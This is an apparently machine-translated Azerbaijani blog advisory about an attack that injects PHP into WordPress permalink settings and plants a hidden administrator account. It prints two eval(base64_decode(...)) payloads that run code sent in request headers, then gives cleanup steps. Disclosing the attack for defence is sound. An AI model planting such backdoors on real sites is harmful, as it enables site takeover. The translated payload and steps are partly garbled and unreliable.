WordPress SQL Enjeksiyonu – Son hücum

Son SQL hücumu saytınıza kod vurulduğu bir çox sayta hücum etdi. Bu MySQL enjeksiyonu permalinklərinizi təsirsiz hala gətirir. Nəticədə blog yazılarınızın URL-ləri işləməyəcəkdir. Çox sayda WordPress bloqu diqqətimizi çəkdiyinə görə Andy Soward sayəsində bu hücumda hədəf aldı.

Bu hücum səbəbiylə permalink quruluşunuza əlavə olunan aşağıdakı kodlardan biri var idi:

% & ({$ {qiymətləndirmə (base64_decode ($ _ SERVER (HTTP_REFERER))))}} |. +) &%

"/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Bu sitatlar saytınızdakı bütün permalinkləri ehtiva edir və yalnız əl ilə qaldırıldıqda dəyişdirilə bilər.

Bunu düzəltmək üçün:

Parametrlər> Permalinks və yuxarıdakı kodu silin və standart kodunuzu dəyişdirin.

Növbəti şey İstifadəçilərə getməkdir. Birdən çox idarəçinin olduğunu görəcəksiniz. Adınızı siyahıda görməyəcəksiniz, ancaq sayın artacağını görəcəksiniz. Beləliklə, nə etməlisiniz, bütün istifadəçilərə baxın və qeydiyyatdan keçənini tapın. Bu istifadəçi üzərində aparın və linki əldə edin. İstifadəçi = kodu əlavə edərək dəyişdirin 1 o nömrəyə. Buna görə görə biləcəyiniz son istifadəçi # istifadəçi olarsa 2əlavə edin 1 və bunu 3. Gizli idarəçinin ilk ad kimi qəribə koda sahib olduğunu tapmalısınız. Kodu silin və abunəçi olun. Sonra geri qayıdın və silin.

Bu problemi həll etməlidir. Ayrıca PHPMyAdmin'ə keçərək onu silə bilərsiniz. Çünki orada istifadəçini görəcəksiniz.

Bu xəbəri ən qısa zamanda almaq istədik ki, istifadəçilərimiz yeniləsinlər. Bloqunuzun yoluxmadığını yoxlamaq üçün əmin olun. Ümid edirik ki, WordPress tezliklə bir çıxışı ilə çıxacaq.

Ayrıca, WordPress idarəetmə sahənizi qorumaq üçün bu tədbirlərdən bəzisini həyata keçirməmisinizsə.